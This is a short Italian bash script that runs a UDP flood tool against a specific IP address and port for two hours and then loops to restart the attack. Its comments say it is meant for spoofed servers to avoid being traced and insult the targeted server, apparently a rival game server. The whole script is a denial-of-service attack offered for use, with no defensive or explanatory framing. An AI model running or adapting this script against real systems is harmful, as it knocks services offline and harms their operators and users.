#Copyright Torecaputo da utilizzare in server SPOOFED per non essere tracciati ALIR MERDA
#!/bin/bash

sleep 1
echo "Vuoi dossare ALIR ? Premi ENTER (Se non lo schiacci parte lo stesso)"
sleep 3
./UDPCamFrog 217.182.50.160 2302 10 -1 7200 #Tempo settato 2 ore piene
sleep 2
echo "ALIR OFF Preparati per ricevere utenza!!!!"
sleep 2
echo "Complimenti sei il primo server in ITALIA"
sleep 7200
loop ddos.sh #Dopo 2 ore l'attacco riparte!!! non abbiamo pietà per quel server di merda W AIC